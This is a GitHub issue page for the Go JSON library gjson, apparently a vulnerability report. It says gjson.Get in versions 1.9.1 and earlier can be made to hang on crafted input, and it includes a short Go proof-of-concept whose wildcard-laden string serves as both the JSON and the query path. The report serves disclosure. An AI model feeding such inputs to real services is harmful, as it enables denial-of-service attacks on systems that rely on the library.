search

tidwall / gjson

Get JSON values quickly - JSON parser for Go
MIT License
14.1k stars 846 forks source link

gjson.Get can cause DoS attacks. GJSON <= 1.9.1 allows attackers to cause a redos via crafted JSON input. #236

Closed cmdrgh closed 2 years ago

cmdrgh commented 2 years ago

func main() { testJson := #[%"*?**?**?**?**?**?***?**?**?**?**?*"""] gjson.Get(testJson, testJson) }